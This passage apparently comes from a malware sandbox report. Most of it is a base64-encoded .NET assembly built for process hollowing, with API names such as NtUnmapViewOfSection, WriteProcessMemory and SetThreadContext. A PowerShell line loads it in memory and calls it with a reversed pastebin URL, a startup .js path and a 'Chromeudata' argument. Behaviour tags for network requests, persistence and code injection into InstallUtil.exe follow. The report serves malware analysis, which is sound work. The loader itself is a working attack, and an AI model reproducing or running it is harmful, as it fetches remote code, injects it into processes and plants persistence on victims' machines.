AAiAAAAKwAAACsyBywmcgEAAHDQBQAAAigPAAAKbxsAAApzHAAACgwXK80IgAUAAAQYK8R+BQAABAoZK7sGKgATMAEADgAAAAYAABEXKwEWLAB+BgAABAoGKh4CgAYAAAQqVnMMAAAGKB0AAAp0BgAAAoAHAAAEKh4CKB4AAAoqEzABAA4AAAAHAAARFysBFiwAfgcAAAQKBioAABMwAQAOAAAABwAAERcrARYsACgNAAAGCgYqHgIoEgAACioAABMwBABDAAAACAAAERcLAn4gAAAKAxcoGwAABgwWKwEWRQMAAAACAAAACgAAABMAAAArGggsBxcKFyvlKxAHF9YLGCvcBxsxxhYKGSvTBioAGzAKAKgFAAAJAAARcjEAAHACKCEAAAoMFisBFkUEAAAABQAAABAAAAAbAAAAJgAAADh8BQAAEgP+FQwAAAIXK9sSBP4VCwAAAhgr0BIDFn0YAAAEGSvFEgPQDAAAAigPAAAKKCIAAAq4fQ0AAAQDKCMAAAoW/gETEhYrARZFKgAAAAUAAAAcAAAARAAAAF4AAABxAAAAgwAAAJIAAACiAAAAvwAAAOUAAAD9AAAAHgEAADcBAABVAQAAcwEAAIcBAACnAQAAuwEAAMkBAADoAQAA9gEAAB8CAAA6AgAATQIAAFoCAABkAgAAfQIAAJECAAClAgAAswIAAMsCAADhAgAABgMAAB4DAAA9AwAAXgMAAHwDAACHAwAAoAMAALEDAADPAwAA9QMAADgSBAAAERIsEwhyPQAAcAMoJAAACgwXODf///8CCH4lAAAKfiUAAAoWGn4lAAAKFBIDEgQoEAAABhb+ARMTGDgP////ERMsBnMmAAAKegQfPCgnAAAKEwUZOPX+//8EEQUfNNYoJwAAChMGGjji/v//ILMAAACNCQAAARMHGzjQ/v//EQcWIAIAAQCeHDjB/v//KCgAAAoa/gETFB04sf7//xEULCURBHsKAAAEEQcoEQAABhb+ARMVHjiU/v//ERUsBnMmAAAKeiskEQR7CgAABBEHKBIAAAYW/gETFh8JOG7+//8RFiwGcyYAAAp6EQcfKZQTCB8KOFb+//8RBHsJAAAEEQge1hIJGhIBKBUAAAYW/gETFx8LODX+//8RFywGcyYAAAp6EQYRCf4BExgfDDgc/v//ERgsJBEEewkAAAQRCSgXAAAGFv4DExkfDTj+/f//ERksBnMmAAAKegQRBR9Q1ignAAAKEwofDjjg/f//BBEFH1TWKCcAAAoTCx8POMz9//8RBHsJAAAEEQYRCiAAMAAAH0AoGAAABhMNHxA4rP3//wUtBxENFv4BKwEWExofETiY/f//ERosKRcTDB8SOIr9//8RBHsJAAAEFhEKIAAwAAAfQCgYAAAGEw0fEzhr/f//EQ0W/gETGx8UOF39//8RGywGcyYAAAp6EQR7CQAABBENBBELEgEoFgAABhb+ARMcHxU4NP3//xEcLAZzJgAACnoRBSD4AAAA1hMOHxY4Gf3//wQRBRzWKCkAAAoTDx8XOAb9//8RDxfaEx0fGDj5/P//FhMeHxk47/z//zi7AAAABBEOHwzWKCcAAAoTHx8aONb8//8EEQ4fENYoJwAAChMgHxs4wvz//wQRDh8U1ignAAAKEyEfHDiu/P//ESAW/gMTIh8dOKD8//8RIixZESAX2hfWjRoAAAETIx8eOIj8//8EESERIxYRI45pKCoAAAofHzhy/P//EQR7CQAABBENER/WESMRI45pEgEoFgAABhb+ARMkHyA4Tfz//xEkLAZzJgAACnoRDh8o1hMOHyE4Nfz//xEeF9YTHhEeER0+PP///xENKCsAAAoTEB8iOBb8//8RBHsJAAAEEQge1hEQGhIBKBYAAAYW/gETJR8jOPX7//8RJSwGcyYAAAp6BBEFHyjWKCcAAAoTER8kONf7//8RDBMmHyU4zPv//xEmLAQRBhMNEQcfLBENERHWnh8mOLP7//8oKAAAChr+ARMnHyc4ovv//xEnLCYRBHsKAAAEEQcoEwAABhb+ARMoHyg4hPv//xEoLAZzJgAACnorJBEEewoAAAQRBygUAAAGFv4BEykfKThe+///ESksBnMmAAAKehEEewoAAAQoGQAABhX+ARMqHyo4PPv//xEqLAZzJgAACnreXSgsAAAKFisBFkUFAAAAAgAAABQAAAAeAAAALAAAADEAAAArNxEEewsAAASEKC0AAAoTKxcr0xErFP4DEywYK8kRLCwKEStvLgAAChkruxYKGiu2KC8AAAobK67eCBcKGjhq+v//BipBHAAAAAAAAGIAAADfBAAAQQUAAF0AAAAYAAABEzACABUAAAAKAAARFysBFiwAAgMoDAAACigNAAAKCgYqAAAAEzABA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SkA8wUBAAABKwA1BgEAAAEtAEcGAQAAAS8A5gMCAAABMQAJBgEAAAEzAIIAAQAEgAAAAQAAAAAAAAAAAAAAAAAbAAAACAAAAAAAAAAAAAAAfAFdAAAAAAACAAAAAAAAAAAAAACFAaUDAAAAAAIAAAAAAAAAAAAAAIUBVAAAAAAAAAAAAAEAAABwBQAACQAEAAoABAALAAgADAAIAAAAEAAUAFIAAAAQAEEAUgAAAAAAQwBSACMAagEjAHcBAAAAAABBYDEAQ29udGV4dFZhbHVlYDEAQ2xhc3MxAENsYXNzTGlicmFyeTEAVG9JbnQzMgBUb0ludDE2AEEAQgBDAEQARQBQcm9qZWN0RGF0YQBkYXRhAG1zY29ybGliAE1pY3Jvc29mdC5WaXN1YWxCYXNpYwBHZXRQcm9jZXNzQnlJZABSZXN1bWVUaHJlYWQAU3luY2hyb25pemVkAENyZWF0ZUluc3RhbmNlAEdldEhhc2hDb2RlAFJ1bnRpbWVUeXBlSGFuZGxlAEdldFR5cGVGcm9tSGFuZGxlAFZhbHVlVHlwZQBBcHBsaWNhdGlvbkJhc2UAQXBwbGljYXRpb25TZXR0aW5nc0Jhc2UARWRpdG9yQnJvd3NhYmxlU3RhdGUAR3VpZEF0dHJpYnV0ZQBFZGl0b3JCcm93c2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAFN0YW5kYXJkTW9kdWxlQXR0cmlidXRlAEhpZGVNb2R1bGVOYW1lQXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAEFzc2VtYmx5RmlsZVZlcnNpb25BdHRyaWJ1dGUAT2JmdXNjYXRpb25BdHRyaWJ1dGUATXlHcm91cENvbGxlY3Rpb25BdHRyaWJ1dGUAQXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBZYW5vQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBTdXBwcmVzc1VubWFuYWdlZENvZGVTZWN1cml0eUF0dHJpYnV0ZQBCeXRlAGdldF9WYWx1ZQBzZXRfVmFsdWUAR2V0T2JqZWN0VmFsdWUAZ2V0X1NpemUAU2l6ZU9mAFRvU3RyaW5nAHBhdGgATWFyc2hhbABNaWNyb3NvZnQuVmlzdWFsQmFzaWMuTXlTZXJ2aWNlcy5JbnRlcm5hbABTeXN0ZW0uQ29tcG9uZW50TW9kZWwAQ2xhc3NMaWJyYXJ5MS5kbGwAa2VybmVsMzIuZGxsAG50ZGxsLmRsbABLaWxsAFN5c3RlbQBCb29sZWFuAFZlcnNpb24AU3lzdGVtLkNvbmZpZ3VyYXRpb24AU3lzdGVtLkdsb2JhbGl6YXRpb24ATnRVbm1hcFZpZXdPZlNlY3Rpb24AU3lzdGVtLlJlZmxlY3Rpb24ARXhjZXB0aW9uAFJ1bgBDdWx0dXJlSW5mbwBaZXJvAEJ1ZmZlcgBSZXNvdXJjZU1hbmFnZXIAVXNlcgBCaXRDb252ZXJ0ZXIAQ29tcHV0ZXIAQ2xlYXJQcm9qZWN0RXJyb3IAU2V0UHJvamVjdEVycm9yAEFjdGl2YXRvcgAuY3RvcgAuY2N0b3IASW50UHRyAFN5c3RlbS5EaWFnbm9zdGljcwBNaWNyb3NvZnQuVmlzdWFsQmFzaWMuRGV2aWNlcwBNaWNyb3NvZnQuVmlzdWFsQmFzaWMuQXBwbGljYXRpb25TZXJ2aWNlcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkNvbXBpbGVyU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBTeXN0ZW0uUmVzb3VyY2VzAENsYXNzTGlicmFyeTEuUmVzb3VyY2VzLnJlc291cmNlcwBHZXRCeXRlcwBSZWZlcmVuY2VFcXVhbHMAUnVudGltZUhlbHBlcnMAQ3JlYXRlUHJvY2VzcwBDb25jYXQARm9ybWF0AE9iamVjdABXb3c2NEdldFRocmVhZENvbnRleHQAV293NjRTZXRUaHJlYWRDb250ZXh0AFZpcnR1YWxBbGxvY0V4AEFycmF5AGdldF9Bc3NlbWJseQBCbG9ja0NvcHkAUmVhZFByb2Nlc3NNZW1vcnkAV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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPhjAAAAAAAAAAAAABJkAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEZAAAAAAAAAAAAAAAAF9Db3JEbGxNYWluAG1zY29yZWUuZGxsAAAAAAD/JQAgABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABABAAAAAYAACAAAAAAAAAAAAAAAAAAAABAAEAAAAwAACAAAAAAAAAAAAAAAAAAAABAAAAAABIAAAAWIAAADwDAAAAAAAAAAAAADwDNAAAAFYAUwBfAFYARQBSAFMASQBPAE4AXwBJAE4ARgBPAAAAAAC9BO/+AAABAAAAAQAAAAAAAAABAAAAAAA/AAAAAAAAAAQAAAACAAAAAAAAAAAAAAAAAAAARAAAAAEAVgBhAHIARgBpAGwAZQBJAG4AZgBvAAAAAAAkAAQAAABUAHIAYQBuAHMAbABhAHQAaQBvAG4AAAAAAAAAsAScAgAAAQBTAHQAcgBpAG4AZwBGAGkAbABlAEkAbgBmAG8AAAB4AgAAAQAwADAAMAAwADAANABiADAAAAAaAAEAAQBDAG8AbQBtAGUAbgB0AHMAAAAAAAAAIgABAAEAQwBvAG0AcABhAG4AeQBOAGEAbQBlAAAAAAAAAAAARAAOAAEARgBpAGwAZQBEAGUAcwBjAHIAaQBwAHQAaQBvAG4AAAAAAEMAbABhAHMAcwBMAGkAYgByAGEAcgB5ADMAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADEALgAwAC4AMAAuADAAAABEABIAAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAEMAbABhAHMAcwBMAGkAYgByAGEAcgB5ADMALgBkAGwAbAAAAEgAEgABAEwAZQBnAGEAbABDAG8AcAB5AHIAaQBnAGgAdAAAAEMAbwBwAHkAcgBpAGcAaAB0ACAAqQAgACAAMgAwADIANAAAACoAAQABAEwAZQBnAGEAbABUAHIAYQBkAGUAbQBhAHIAawBzAAAAAAAAAAAATAASAAEATwByAGkAZwBpAG4AYQBsAEYAaQBsAGUAbgBhAG0AZQAAAEMAbABhAHMAcwBMAGkAYgByAGEAcgB5ADMALgBkAGwAbAAAADwADgABAFAAcgBvAGQAdQBjAHQATgBhAG0AZQAAAAAAQwBsAGEAcwBzAEwAaQBiAHIAYQByAHkAMwAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEALgAwAC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAuADAALgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgAAAMAAAAJDQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';[Byte[]] $EuKVK = [System.Convert]::FromBase64String( $bFjDJ );[System.AppDomain]::CurrentDomain.Load($EuKVK).GetType('ClassLibrary3.reed').GetMethod('testd').Invoke($null, [object[]] ('xvdvZ3wN/war/moc.nibetsap//:sptth' , 'C:\Users\Admin\AppData\Roaming\úùÆüÔ.js' , 'Chromeudata', '3', '1', 'Regedit Name' ) );
    3⤵
    - Blocklisted process makes network request
    - Drops startup file
    - Suspicious use of SetThreadContext
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2684
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
      4⤵
      Checks processor information in registry
      PID:1700

C:\Windows\System32\WScript.exe
